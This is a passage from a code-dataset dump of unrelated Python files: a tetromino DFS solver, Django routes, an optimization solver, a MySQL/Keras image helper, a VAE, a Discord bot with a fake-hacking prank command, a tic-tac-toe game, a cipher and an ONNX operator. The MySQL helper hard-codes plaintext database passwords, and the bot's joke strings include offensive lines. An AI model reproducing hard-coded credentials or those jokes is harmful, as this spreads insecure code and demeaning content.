sumV\n\nprint(result)\n\nㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ\n# DFS 풀이\n# [A] delta 방향 설정\ndi = [-1, 1, 0, 0]\ndj = [0, 0, -1, 1] # 상하좌우\n\n# [B] dfs 함수 설정\ndef dfs(i, j, n, sumV):\n global result\n # [B-1] 가지치기 조건. 아무리 max를 더해도 result보다 작을 때\n if result > sumV + maxV * (4 - n):\n return\n # [B-2] 종료 조건. 4개의 정사각형을 더했다면 result값과 비교\n if n == 4:\n if result < sumV:\n result = sumV\n return\n\n # [B-3] 상하좌우 방향대로 dfs 탐색\n for dr in range(4):\n ni, nj = i+di[dr], j+dj[dr]\n if 0 <= ni < N and 0 <= nj < M and not visited[ni][nj]:\n if n == 2: # [B-4] 이 조건을 넣지 않으면 'ㅏ' 블럭이 만들어지지 않는다.\n visited[ni][nj] = 1\n dfs(i, j, n+1, sumV + paper[ni][nj])\n visited[ni][nj] = 0\n\n visited[ni][nj] = 1\n dfs(ni, nj, n+1, sumV + paper[ni][nj])\n visited[ni][nj] = 0\n\n# [1] 입력값 설정\nfrom sys import stdin\nN, M = map(int, stdin.readline().split())\npaper = [[] for _ in '_'*N]\nfor i in range(N):\n paper[i] = list(map(int, stdin.readline().split()))\n\n# [2] dfs 탐색\nresult = 0\nmaxV = max(map(max, paper))\nvisited = [[0]*M for _ in '_'*N]\nfor i in range(N):\n for j in range(M):\n visited[i][j] = 1\n dfs(i, j, 1, paper[i][j])\n visited[i][j] = 0\n\nprint(result)","repo_name":"Seori15/algorithm","sub_path":"python/BOJ/BOJ_14500_테트로미노.py","file_name":"BOJ_14500_테트로미노.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"39533115944","text":"\"\"\"StudentiUniMi URL Configuration\n\nThe `urlpatterns` list routes URLs to views.\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.http import HttpResponse, HttpRequest\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\nfrom sentry_sdk import configure_scope\n\nimport telegrambot.urls\nimport university.urls\n\nadmin.site.site_header = \"Network StudentiUniMi - administration\"\n\n\ndef healthcheck(_: HttpRequest) -> HttpResponse:\n with configure_scope() as scope:\n if scope.transaction:\n scope.transaction.sampled = False\n return HttpResponse(\"hello, you hacker!\\n\", content_type=\"text/plain\")\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(university.urls)),\n path('telegrambot/', include(telegrambot.urls)),\n url(r'^robots.txt$', lambda r: HttpResponse(\n \"User-Agent: *\\nDisallow: /\",\n content_type=\"text/plain\",\n ), name=\"robots_txt\"),\n url(r\"^healthcheck$\", healthcheck, name=\"healthcheck\"),\n]\n\nif not settings.DEBUG:\n urlpatterns.append(\n path('', RedirectView.as_view(url=\"https://api.studentiunimi.it/admin/\"),\n name='root-redirect'),\n )\n","repo_name":"StudentiUniMi/backend","sub_path":"StudentiUniMi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"25164658409","text":"import numpy as np\nfrom gurobipy import quicksum\n\nfrom CounterfactualAnalysis.TreeEnsembleSolver import CESolver_TreeEnsemble\n\nclass CESolver_RandomForest(CESolver_TreeEnsemble):\n def __init__(self, estimator, lambda0, lambda1, lambda2, eps, timelimit):\n super().__init__(estimator, lambda0, lambda1, lambda2, eps, timelimit)\n self.T = self.estimator.n_estimators\n self.M1 = 1\n self.M2 = 1\n\n def build(self, x0, yCE):\n super().build(x0, yCE)\n self.class_assignment = self.model.addConstrs((quicksum(self.getWeight(t,l,yCE)*self.z[t,l] for t in range(self.T) for l in self.getLeaves(t)) >= 1.e-4 + quicksum(self.getWeight(t,l,k)*self.z[t,l] for t in range(self.T) for l in self.getLeaves(t)) for k in self.K if k!=yCE))\n self.reset.append(self.class_assignment)\n\n def getWeight(self, t, l, k):\n value = self.getTree(t).value[l,0,:]\n return (1/self.T*(value[np.where(self.K==k)[0]]/np.sum(value)))[0]\n","repo_name":"ceciliasalvatore/sFCCA","sub_path":"CounterfactualAnalysis/RandomForestSolver.py","file_name":"RandomForestSolver.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15341155148","text":"import base64\r\nimport mysql.connector\r\nfrom datetime import date\r\nimport time\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nfrom keras.utils import load_img, img_to_array\r\nfrom io import BytesIO\r\n\r\ndef predict_value(bytes_data):\r\n model = load_model(\"E:/APASD/predimg.h5\")\r\n # Create a binary buffer from the bytes object\r\n buffer = BytesIO(bytes_data)\r\n\r\n image = load_img(buffer, target_size=(150,150))\r\n image = img_to_array(image)\r\n image = np.expand_dims(image,axis=0)\r\n val = model.predict(image)\r\n if val>0.5:\r\n return \"Signature\"\r\n else:\r\n return \"Photograph\"\r\n\r\ndef insertIMAGEDATA(image):\r\n try:\r\n connection = mysql.connector.connect(\r\n host=\"127.0.0.1\",\r\n user=\"root\",\r\n database=\"mydatabase\",\r\n password=\"P@ssword1\"\r\n )\r\n \r\n cursor = connection.cursor()\r\n query = \"\"\" INSERT INTO IMAGEDATA\r\n (UPLOADED_DATE, DATE, UPLOADED_TIME, TIME, IMAGE, PREDICTED_VALUE) \r\n VALUES (%s,%s,%s,%s,%s,%s)\"\"\"\r\n \r\n uploaded_date = date.today()\r\n r_date = uploaded_date.strftime(\"%d %B, %Y\")\r\n uploaded_time = time.strftime(\"%I:%M:%S\",time.localtime())\r\n r_time = time.strftime(\"%I:%M %p\",time.localtime())\r\n predicted_value = predict_value(image)\r\n insert_tuple = (uploaded_date, r_date, uploaded_time, r_time, image, predicted_value)\r\n cursor.execute(query, insert_tuple)\r\n connection.commit()\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed inserting data into MySQL table {}\".format(error))\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n finally:\r\n if connection.is_connected():\r\n cursor.close()\r\n connection.close()\r\n\r\ndef retrieveIMAGEDATA():\r\n final_array = []\r\n try:\r\n connection = mysql.connector.connect(\r\n host=\"127.0.0.1\",\r\n user=\"root\",\r\n database=\"mydatabase\",\r\n password=\"Deepak@973\"\r\n )\r\n\r\n cursor = connection.cursor()\r\n query = \"\"\"SELECT DATE, TIME, IMAGE, PREDICTED_VALUE FROM IMAGEDATA ORDER BY UPLOADED_DATE DESC,UPLOADED_TIME DESC LIMIT 5\"\"\"\r\n cursor.execute(query)\r\n record = cursor.fetchall()\r\n for row in record:\r\n sub_dict = dict()\r\n sub_dict[\"uploaded_date\"] = str(row[0])\r\n sub_dict[\"uploaded_time\"] = str(row[1])\r\n sub_dict[\"image\"] = base64.b64encode(row[2]).decode('utf-8')\r\n sub_dict[\"predicted_value\"] = str(row[3])\r\n final_array.append(sub_dict)\r\n connection.commit()\r\n\r\n except mysql.connector.Error as error:\r\n print(\"Failed inserting data into MySQL table {}\".format(error))\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n finally:\r\n if connection.is_connected():\r\n cursor.close()\r\n connection.close()\r\n return final_array\r\n","repo_name":"Deepak973-create/Photo-Sign-Detection","sub_path":"my_project/my_library.py","file_name":"my_library.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70023404375","text":"\"\"\" Compute average energy in input bins.\n\"\"\"\nimport sys\nfrom copy import copy\n\nfrom pyrate.core.Algorithm import Algorithm\n\n\nclass AverageBinEnergy(Algorithm):\n __slots__ = ()\n\n def __init__(self, name, store, logger):\n super().__init__(name, store, logger)\n\n def execute(self, config):\n\n e = self.store.get(\"EVENT:nT:edepScint\")\n\n self.store.put(config[\"name\"], e)\n\n\n# EOF\n","repo_name":"fscutti/pyrate","sub_path":"pyrate/algorithms/muondet/AverageBinEnergy.py","file_name":"AverageBinEnergy.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29439243256","text":"# rosalind_lgis.txt\nimport sys\nimport numpy as np \n\nf = sys.argv[1]\n\nnum_list = []\nwith open(f,'r') as handle:\n for line in handle:\n line = line.replace('\\n','')\n num_list.append(line.split(' ')) \nx = []\nfor i in num_list:\n for j in i:\n x.append(int(j))\n\nx1 = x[:30]\n'''\ni_count = {}\nd_count = {}\nfor i in range(len(x1)):\n if i == 0:\n i_count[x1[i]] = 1\n d_count[x1[i]] = 1\n elif max(list(i_count.keys())) < x1[i]:\n i_count[x1[i]] = max(i_count.keys())+1\n elif max(i_count.keys()) > x1[i]:\n i_count[x1[i]] = max(i_count.keys()< x1[i]) +1\n\nprint(i_count)\n'''\nd = {1:2,2:3,4:5,6:8,3:2}\nprint(max(list(d.keys())) < 5)\n","repo_name":"kjh918/rosalind","sub_path":"Bioinformatics_Stronghold/rosalind_LIS2.py","file_name":"rosalind_LIS2.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40511390855","text":"from typing import Literal, Tuple\n\nimport torch\nimport torch.nn as nn\n\nfrom src.layers.initialization import weights_init\nfrom src.training.loss import ReconstructionLoss\nfrom .base import BaseModel, TrainingInit\n\n\nclass VariationalAutoEncoder(BaseModel):\n def __init__(self,\n encoder: nn.Sequential,\n latent: nn.Module,\n decoder: nn.Sequential,\n recons_loss: ReconstructionLoss,\n latent_loss: nn.Module,\n training: TrainingInit,\n ):\n super().__init__(training)\n self.encoder = encoder\n self.decoder = decoder\n self.latent = latent\n self.recons_loss = recons_loss\n self.latent_loss = latent_loss\n\n self.reset_parameters()\n\n def reset_parameters(self):\n weights_init(self.encoder)\n weights_init(self.decoder)\n\n def forward(self, inputs):\n h = self.encoder(inputs)\n z, params = self.latent(h)\n recons = self.decoder(z)\n return recons, z, params\n\n def embed(self, inputs):\n return self.latent(self.encoder(inputs))[0]\n\n def decode(self, z):\n return self.decoder(z)\n\n def posterior(self, inputs):\n return self.latent(self.encoder(inputs))[1]\n\n def _step(\n self,\n batch: Tuple[torch.Tensor, torch.Tensor],\n batch_idx: int,\n phase: Literal[\"train\", \"val\", \"test\"]\n ):\n is_train = phase == \"train\"\n if is_train and hasattr(self.latent_loss, \"update_parameters\"):\n self.latent_loss.update_parameters(self.global_step)\n\n inputs, targets = batch\n recons, z, params = self.forward(inputs)\n\n recons_loss = self.recons_loss(recons, targets)\n latent_loss = self.latent_loss(z, params)\n\n loss = recons_loss + latent_loss\n\n self.log_dict(\n {\n f\"{phase}/loss\": loss,\n f\"{phase}/latent_term\": latent_loss,\n f\"{phase}/reconstruction_loss\": recons_loss\n },\n on_epoch=not is_train,\n on_step=is_train,\n prog_bar=is_train,\n sync_dist=not is_train,\n rank_zero_only=True\n )\n\n return loss\n","repo_name":"miltonllera/ocdm","sub_path":"src/model/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11665353399","text":"num = input()\n\ndial = ['ABC', 'DEF', 'GHI', 'JKL', 'MNO', 'PQRS', 'TUV', 'WXYZ']\ntime = 0\n\nfor n in num:\n for d in dial:\n if n in d:\n time += dial.index(d)+3\n\nprint(time)","repo_name":"SsoYeon-kim/CodingTest-Python","sub_path":"BJ/step_06/5622.py","file_name":"5622.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33727350735","text":"from git import Repo\nimport argparse\n\nimport chain_runner\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='index_generator_chain_runner.py --project-dir '\n '--project-id --branch ')\n parser.add_argument('-pd', '--project-dir', help='Project directory for indexing ', required=True)\n parser.add_argument('-pi', '--project-id', help='Project Id', required=True)\n parser.add_argument('-b', '--branch', help='Branch', required=False)\n args = parser.parse_args()\n\n return args.project_dir, args.project_id, args.branch\n\n\nrepo_directory, project_id, branch = parse_arguments()\n\nprint('project_dir = ' + repo_directory)\nprint('project_id = ' + project_id)\n\nrepo = Repo(repo_directory)\n\nrepo.git.checkout(\"develop\")\nrepo.remotes.origin.fetch()\ncommits_behind = repo.iter_commits('develop..develop@{u}')\ncommits = list(commits_behind)\n\nif len(commits) == 0:\n print(\"Current branch is {} behind. Pulling new code\".format(len(commits)))\n repo_is_dirty = repo.is_dirty()\n if repo_is_dirty:\n print(\"Dirty\")\n print(\"Stashing...\")\n repo.git.stash('save')\n\n repo.remotes.origin.pull()\n chain_runner.generate_index_and_send(repo_directory, project_id)\n\n if repo_is_dirty:\n print(\"unstashing\")\n repo.git.stash('pop')\nelse:\n print(\"No updates nothing to do here\")\n","repo_name":"damintsew/idea-shared-index-standalone-runner","sub_path":"remote_git_checker.py","file_name":"remote_git_checker.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"13733780478","text":"import discord\nimport random\nimport asyncio\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions, CheckFailure\n\n\nclass Interaction(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=[\"dankr8\"])\n async def dankrater(self, ctx):\n v = [\"100%\",\n \"99%\",\n \"98%\",\n \"95%\",\n \"87%\",\n \"85%\",\n \"82%\",\n \"80%\",\n \"76%\",\n \"74%\",\n \"70%\",\n \"69%\",\n \"65%\",\n \"54%\",\n \"57%\",\n \"50%\",\n \"49%\"\n \"45%\",\n \"47%\",\n \"42%\",\n \"40%\",\n \"36%\",\n \"35%\",\n \"25%\",\n \"23%\",\n \"18%\",\n \"15%\",\n \"13%\",\n \"10%\",\n \"7%\",\n \"5%\",\n \"3%\",\n \"2%\",\n \"1%\"]\n embed=discord.Embed(color=0x0338b5)\n embed.add_field(name=\"Dank r8 machine\", value=f\"Il tuo potenziale memetico è: **{random.choice(v)}**\", inline=False)\n await ctx.send(embed=embed)\n\n @commands.command()\n async def say(self, ctx, *, arg):\n if (arg) == \"Sono stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"sono stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"Sono uno stupido\":\n await ctx.send(\"Lo sappiamo.\")\n elif (arg) == \"sono uno stupido\":\n await ctx.send(\"Lo sappiamo.\")\n else:\n await ctx.send(f\"{arg} \\n\\n\\n- **{ctx.author}**\")\n\n # Command of questions. The bot send a random response for any type of question\n @commands.command(aliases=[\"8ball\", \"oracolo\", \"predizione\", \"domanda\"])\n async def erdubbio(self, ctx, *, question):\n responses = [\"E' certo.\",\n \"E' stato deciso così.\",\n \"Senza dubbio.\",\n \"Già....indubbiamente.\",\n \"Contaci.\",\n \"Per come la vedo io, si.\",\n \"Preferibilmente.\",\n \"Vedila così.\",\n \"Sì.\",\n \"Un punto in più per il 'Sì'.\",\n \"uhm... Sono un po' confuso, potresti ripetere la domanda?\",\n \"Chiedimelo più tardi..\",\n \"E' meglio non dirtelo ora.\",\n \"Mi risulta difficile predirlo ora.\",\n \"Concentrati e chiedimelo di nuovo.\",\n \"Non ci contare.\",\n \"La mia risposta è no.\",\n \"Le mie fonti dicono di no.\",\n \"Pessima prospettiva.\",\n \"Dubito.\"]\n embed = discord.Embed(color=0xa7c7fb)\n embed.add_field(name=\"(?) ErDubbio (?)\", value=\"*Poni le tue più strambe domande a questo magnifico oracolo dotato di tanta saggezza e righe di codice\", inline=False)\n embed.add_field(name=\":question: Domandona:\", value=f\"{question}\", inline=True)\n embed.add_field(name=\":speech_left: Risposta epica:\", value=f\"{random.choice(responses)}\", inline=True)\n embed.set_footer(text=\"Leonardus Project\")\n await ctx.send(embed=embed)\n\n @commands.command(aliases=[\"hack\"])\n async def akeraggio(self, ctx, member: commands.MemberConverter):\n message = await ctx.send(f\"Sto hackerando con paint {member}...\")\n await asyncio.sleep(2)\n await message.edit(content='Sono penetrato nel sistema!')\n await asyncio.sleep(3)\n await message.delete()\n await asyncio.sleep(0.2)\n message = await ctx.send(\"[▙] Eseguo un leak dell'email discord...(2fa Bypass)\")\n await asyncio.sleep(3)\n await message.edit(content=\"[▛] **Gotcha!**\")\n email = await ctx.send(f\"**EMAIL:** `{member}@email.net` \\n**PASSWORD:** `PASSW0RD`\")\n await asyncio.sleep(4)\n await message.delete()\n await email.delete()\n await asyncio.sleep(0.1)\n message = await ctx.send(\"[▟] Spio i messaggi recenti...\")\n await asyncio.sleep(2)\n dms = [\"send nudes\",\n \"Ammetto che adoro i canditi\",\n \"Napoli merda\",\n \"Tifo Juve\",\n \"Ieri ho rubato 2 orologi\",\n \"Cyca mala criminale\",\n \"mlmlml, che belli i bimbi neri\"]\n await message.edit(content=f\"**Leak degli ultimi dms**: '`{random.choice(dms)}`'\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▙] Rubo le credenziali di steam...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▛] Credenziali di steam rubate :)\")\n await asyncio.sleep(2)\n await message.edit(content=f\"[▜] Traccio l'IP...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"[▟] **IP TROVATO:** `127.0.0.1`\")\n await asyncio.sleep(2)\n await message.edit(content=f\"[▙] Scopro la cronologia...\")\n await asyncio.sleep(3)\n await message.edit(content=f\"**CRONOLOGIA TROVATA** \\n*Lista:* \\n`How to buil a bomb`\\n`How to kidnapp`\\n`Come dichiarare le variabili in HTML`\")\n await asyncio.sleep(5)\n await message.edit(content=f\"*Rivendo i dati al governo...*\")\n await asyncio.sleep(3)\n await message.edit(content=f\"*Rendo {member} ricercato in 5 paesi differenti...*\")\n await asyncio.sleep(4)\n await message.edit(content=f\"*Infetto il computer di {member} con diversi virus...*\")\n await asyncio.sleep(2)\n await message.edit(content=f\"Fine. *{member}* è stato hackerato!\")\n await ctx.send(\"Processo di hackeraggio **100%** *reale* e *pericoloso* terminato.\")\n\n\n\n\n\n\n\ndef setup(client):\n client.add_cog(Interaction(client))","repo_name":"sl04zy/Leonardus-Project","sub_path":"src/cogs/Interaction.py","file_name":"Interaction.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"it","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"72758450134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on: Friday December 17th of January 2020\n\nAuthor: Daniel Cortild (https://github.com/DanielCortild)\n\nTicTacToe Judger Module\nThe Judger Monitors the Game\n\"\"\"\n\nfrom modules.state import State\n\nclass Judger:\n\n def __init__ ( self, p1, p2, learning = True ):\n\n self.p1 = p1\n self.p1Symbol = 1\n self.p1.setSymbol( self.p1Symbol )\n\n self.p2 = p2\n self.p2Symbol = -1\n self.p2.setSymbol( self.p2Symbol )\n\n self.currentPlayer = None\n\n self.learning = learning\n\n self.currentState = State()\n\n def giveReward ( self ):\n\n if self.currentState.winner == self.p1Symbol:\n\n self.p1.feedReward(1)\n self.p2.feedReward(0)\n\n elif self.currentState.winner == self.p2Symbol:\n\n self.p1.feedReward(0)\n self.p2.feedReward(1)\n\n else:\n\n self.p1.feedReward(0.5)\n self.p2.feedReward(0.5)\n\n def feedCurrentState ( self ):\n\n self.p1.feedState( self.currentState )\n self.p2.feedState( self.currentState )\n\n def reset ( self ):\n\n self.p1.reset()\n self.p2.reset()\n\n self.currentState = State()\n self.currentPlayer = None\n\n def play ( self, show = False ):\n\n self.reset()\n self.feedCurrentState()\n\n if show:\n self.currentState.show()\n\n while True:\n\n if self.currentPlayer == self.p1:\n self.currentPlayer = self.p2\n else:\n self.currentPlayer = self.p1\n\n [i, j, symbol] = self.currentPlayer.takeAction()\n\n self.currentState = self.currentState.nextState( i, j, symbol )\n hashValue = self.currentState.getHash()\n\n self.feedCurrentState()\n\n if show:\n self.currentState.show()\n\n if self.currentState.isEnd():\n\n if self.learning:\n self.giveReward()\n\n return self.currentState.winner\n","repo_name":"DanielCortild/TicTacToe","sub_path":"Python/modules/judger.py","file_name":"judger.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11780679149","text":"def encrypt(s,key):\n n=len(s)\n matrix=[[0 for _ in range(n)] for _ in range(key)]\n bool=False\n i=0\n j=0\n for k in range(n):\n matrix[i][j]=s[k]\n k+=1\n if i==0 or i==key-1:\n bool=not bool\n \n if bool:\n i+=1\n else:\n i-=1\n j+=1\n\n ans=\"\"\n for i in range(key):\n for j in range(n):\n if matrix[i][j]!=0:\n ans+=matrix[i][j]\n return ans\n\n\ns=input(\"Enter the string to be encrypted : \")\nk=int(input(\"Enter the key value of rail fence : \"))\nnew=encrypt(s,k)\nprint(\"The encrypted String is : \" , new)","repo_name":"Iamayushgupta/Blockchain","sub_path":"cryptography/rail_fence.py","file_name":"rail_fence.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31142745079","text":"# Ask the user for a number and determine whether the number is prime or not.\n# (For those who have forgotten, a prime number is a number that has no divisors.).\n# You can (and should!) use your answer in Exercise 4 to help you.\n# Take this opportunity to practice using functions, described below\n\n\ndef is_divisor(num, divisor):\n return num % divisor == 0\n\n\ndef is_prime(num):\n count = 0\n for i in range(2, num):\n if is_divisor(num, i):\n count += 1\n if count == 0:\n return True\n else:\n return False\n\n\nprime_number = int(input(\"Please enter a number: \"))\nprint(is_prime(prime_number))\n\n","repo_name":"nitzanpap/practiceAndExercises","sub_path":"pythonExercises/exercise11.py","file_name":"exercise11.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33057914787","text":"\nimport tensorflow as tf\nfrom model.common import conv2d_bn_mish\n\ndef spp(x):\n pool_sizes = [5, 9, 13]\n pooling_results = [tf.keras.layers.MaxPooling2D((pool_size,pool_size), strides=(1, 1),padding='same')(x) for pool_size in pool_sizes]\n spp_result = tf.keras.layers.Concatenate()(pooling_results+[x])\n spp_result = conv2d_bn_mish(spp_result, x.shape[3], (1, 1))\n return spp_result\n\n","repo_name":"wangermeng2021/Scaled-YOLOv4-tensorflow2","sub_path":"model/spp.py","file_name":"spp.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"67"} +{"seq_id":"71577354132","text":"import sys\nfrom obj.BibliotekaObj import Biblioteka\nimport utils.constants as c\nimport utils.db as db\nimport utils.utils as u\n\nTEST_MODE = False\n\ndef sprawdzCzyTrybTestowy():\n if len(sys.argv) > 1:\n if sys.argv[1] == 'test':\n TEST_MODE = True\n print(\"Uruchomiono w trybie testowym...\")\n\nif __name__ == \"__main__\":\n sprawdzCzyTrybTestowy()\n db.inicjujDane()\n biblioteka = Biblioteka(TEST_MODE)\n biblioteka.ladujBiblioteke()\n while True:\n menuWybor = u.czyscWejscie(input(c.ASCII_MENU), trybTestowania=TEST_MODE)\n if (menuWybor == '1'):\n biblioteka.dodajKsiazke()\n elif (menuWybor == '2'):\n biblioteka.wypozyczKsiazke()\n elif (menuWybor == '3'):\n biblioteka.oddajKsiazke()\n elif (menuWybor == '4'):\n biblioteka.podejrzyjHistorieKsiazki()\n elif (menuWybor == '5'):\n biblioteka.dodajCzytacza()\n elif (menuWybor == '6'):\n print(f\"Zamykanie programu...\")\n break\n else:\n print(\"Wybrano nie istniejącą opcję w menu...\")\n SystemExit(0)\n","repo_name":"gkk-dev-ops/py-beginner-exercises","sub_path":"Projekt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10208812690","text":"# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\nclass ZipMapDictionary(dict):\n \"\"\"\n Custom dictionary class much faster for this runtime,\n it implements a subset of the same methods.\n \"\"\"\n __slots__ = ['_rev_keys', '_values', '_mat']\n\n @staticmethod\n def build_rev_keys(keys):\n res = {}\n for i, k in enumerate(keys):\n res[k] = i\n return res\n\n def __init__(self, rev_keys, values, mat=None):\n \"\"\"\n @param rev_keys returns by @see me build_rev_keys,\n *{keys: column index}*\n @param values values\n @param mat matrix if values is a row index,\n one or two dimensions\n \"\"\"\n if mat is not None:\n if not isinstance(mat, numpy.ndarray):\n raise TypeError( # pragma: no cover\n f'matrix is expected, got {type(mat)}.')\n if len(mat.shape) not in (2, 3):\n raise ValueError( # pragma: no cover\n f\"matrix must have two or three dimensions but got {mat.shape}.\")\n dict.__init__(self)\n self._rev_keys = rev_keys\n self._values = values\n self._mat = mat\n\n def __getstate__(self):\n \"\"\"\n For pickle.\n \"\"\"\n return dict(_rev_keys=self._rev_keys,\n _values=self._values,\n _mat=self._mat)\n\n def __setstate__(self, state):\n \"\"\"\n For pickle.\n \"\"\"\n if isinstance(state, tuple):\n state = state[1]\n self._rev_keys = state['_rev_keys']\n self._values = state['_values']\n self._mat = state['_mat']\n\n def __getitem__(self, key):\n \"\"\"\n Returns the item mapped to keys.\n \"\"\"\n if self._mat is None:\n return self._values[self._rev_keys[key]]\n return self._mat[self._values, self._rev_keys[key]]\n\n def __setitem__(self, pos, value):\n \"unused but used by pickle\"\n pass\n\n def __len__(self):\n \"\"\"\n Returns the number of items.\n \"\"\"\n return len(self._values) if self._mat is None else self._mat.shape[1]\n\n def __iter__(self):\n for k in self._rev_keys:\n yield k\n\n def __contains__(self, key):\n return key in self._rev_keys\n\n def items(self):\n if self._mat is None:\n for k, v in self._rev_keys.items():\n yield k, self._values[v]\n else:\n for k, v in self._rev_keys.items():\n yield k, self._mat[self._values, v]\n\n def keys(self):\n for k in self._rev_keys.keys():\n yield k\n\n def values(self):\n if self._mat is None:\n for v in self._values:\n yield v\n else:\n for v in self._mat[self._values]:\n yield v\n\n def asdict(self):\n res = {}\n for k, v in self.items():\n res[k] = v\n return res\n\n def __str__(self):\n return f\"ZipMap({str(self.asdict())!r})\"\n\n\nclass ArrayZipMapDictionary(list):\n \"\"\"\n Mocks an array without changing the data it receives.\n Notebooks :ref:`onnxnodetimerst` illustrates the weaknesses\n and the strengths of this class compare to a list\n of dictionaries.\n\n .. index:: ZipMap\n \"\"\"\n\n def __init__(self, rev_keys, mat):\n \"\"\"\n @param rev_keys dictionary *{keys: column index}*\n @param mat matrix if values is a row index,\n one or two dimensions\n \"\"\"\n if mat is not None:\n if not isinstance(mat, numpy.ndarray):\n raise TypeError( # pragma: no cover\n f'matrix is expected, got {type(mat)}.')\n if len(mat.shape) not in (2, 3):\n raise ValueError( # pragma: no cover\n f\"matrix must have two or three dimensions but got {mat.shape}.\")\n list.__init__(self)\n self._rev_keys = rev_keys\n self._mat = mat\n\n @property\n def dtype(self):\n return self._mat.dtype\n\n def __len__(self):\n return self._mat.shape[0]\n\n def __iter__(self):\n for i in range(len(self)):\n yield self[i]\n\n def __getitem__(self, i):\n return ZipMapDictionary(self._rev_keys, i, self._mat)\n\n def __setitem__(self, pos, value):\n raise RuntimeError(\n f\"Changing an element is not supported (pos=[{pos}]).\")\n\n @property\n def values(self):\n \"\"\"\n Equivalent to ``DataFrame(self).values``.\n \"\"\"\n if len(self._mat.shape) == 3:\n return self._mat.reshape((self._mat.shape[1], -1))\n return self._mat\n\n @property\n def columns(self):\n \"\"\"\n Equivalent to ``DataFrame(self).columns``.\n \"\"\"\n res = [(v, k) for k, v in self._rev_keys.items()]\n if len(res) == 0:\n if len(self._mat.shape) == 2:\n res = [(i, 'c%d' % i) for i in range(self._mat.shape[1])]\n elif len(self._mat.shape) == 3:\n # multiclass\n res = [(i, 'c%d' % i)\n for i in range(self._mat.shape[0] * self._mat.shape[2])]\n else:\n raise RuntimeError( # pragma: no cover\n \"Unable to guess the right number of columns for \"\n \"shapes: {}\".format(self._mat.shape))\n else:\n res.sort()\n return [_[1] for _ in res]\n\n @property\n def is_zip_map(self):\n return True\n\n def __str__(self):\n return f\"ZipMaps[{', '.join(map(str, self))}]\"\n\n\nclass ZipMap(OpRun):\n \"\"\"\n The class does not output a dictionary as\n specified in :epkg:`ONNX` specifications\n but a @see cl ArrayZipMapDictionary which\n is wrapper on the input so that it does not\n get copied.\n \"\"\"\n\n atts = {'classlabels_int64s': [], 'classlabels_strings': []}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=ZipMap.atts,\n **options)\n if hasattr(self, 'classlabels_int64s') and len(self.classlabels_int64s) > 0:\n self.rev_keys_ = ZipMapDictionary.build_rev_keys(\n self.classlabels_int64s)\n elif hasattr(self, 'classlabels_strings') and len(self.classlabels_strings) > 0:\n self.rev_keys_ = ZipMapDictionary.build_rev_keys(\n self.classlabels_strings)\n else:\n self.rev_keys_ = {}\n\n def _run(self, x, attributes=None, verbose=0, fLOG=None): # pylint: disable=W0221\n res = ArrayZipMapDictionary(self.rev_keys_, x)\n return (res, 